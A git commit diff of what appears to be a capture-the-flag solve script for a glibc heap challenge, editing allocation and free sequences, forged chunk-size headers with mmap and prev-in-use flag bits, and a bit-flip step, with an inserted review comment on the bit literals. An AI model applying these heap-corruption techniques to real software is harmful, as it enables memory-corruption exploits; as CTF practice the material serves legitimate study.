commit d2d73f68c7b4ffdb3701fb43e2e533a8612cba72
parent 5427cf2925151b678e46e5d2e74c634c109bd11f
Author: Louis Burda <quent.burda@gmail.com>
Date: Sat, 27 Apr 2024 04:15:55 +0200
Stash
Diffstat:
1 file changed, 10 insertions(+), 11 deletions(-)
diff --git a/solve/solve b/solve/solve
@@ -94,7 +94,6 @@ gdb = 'gdb -ex "set debug-file-directory $PWD/debug" -ex "dir glibc" -ex "set de
+ ' -ex "target remote localhost:1025" -ex "b main" -ex "b exit" -ex "continue"'
run_in_new_terminal(["sh", "-c", f'sleep 1; sudo -E {gdb}'], kill_at_exit=False)
-dup = alloc(cc() * adj(small_size))
back = alloc(cc() * adj(small_size))
past = alloc(cc() * adj(small_size))
target = alloc(cc() * adj(small_size))
@@ -105,10 +104,6 @@ head = alloc(cc() * mmap_adj(mmap_size_1))
front = alloc(cc() * mmap_adj(mmap_size_1))
grid = [alloc(cc() * mmap_adj(mmap_size_1)) for _ in range(3)][::-1]
-embed()
-free(grid[0])
-free(dup)
-assert(dup == alloc(cc() * mmap_adj(mmap_size_1)))
list(map(free, grid))
free(front)
@@ -118,7 +113,7 @@ adjust = 0x5000
free(back)
back_map = {
mmap_size_3 - mmap_size_1 - 16: p64(0),
- mmap_size_3 - mmap_size_1 - 8: p64(adjust^0b010)
+ mmap_size_3 - mmap_size_1 - 8: p64((mmap_size_1+adjust)^0b010)
}
index = len(grid)-1
offset = mmap_size_1
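Review bot: The new `mmap_size_3 - mmap_size_1 - 8` entry of `back_map` uses the unexplained bit literal `0b010`, and `^` toggles that bit rather than setting it, so the intent only holds while `mmap_size_1 + adjust` has bit 1 clear (likely, given the page-sized values, but not stated anywhere). Naming the bit once next to `adjust`, e.g. `IS_MMAPPED = 0b010  # glibc chunk-size flag bit`, and writing the entry as `p64((mmap_size_1 + adjust) | IS_MMAPPED)` makes the meaning explicit; the same applies to the `0b001` literal (presumably `PREV_INUSE`) used in the last hunk. The `back_map` dict is complete within this hunk, but `adjust`, `back` and the sizes it references are defined outside it.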
@@ -141,13 +136,17 @@ for i in range(1, len(grid)):
free(target)
target = alloc(cc() * mmap_adj(mmap_size_3))
-free(past)
past = alloc(cc() * mmap_adj(mmap_size_3))
-# equivalent to grid 0
-edit(dup, flat({
- mmap_size_1 - (mmap_size_3 % mmap_size_1) - 8: p64(tcache_size^0b001)
-}, mmap_adj(mmap_size_1)))
+flip_size = 0x40000
+flip(grid[0], -8, flip_size)
+free(grid[0])
+
+#past = alloc(cc() * mmap_adj(mmap_size_3)))
+
+past = alloc(flat({
+ mmap_size_3 - mmap_size_2 - 8: p64(tcache_size^0b001)
+}, mmap_adj(mmap_size_3)))
free(target)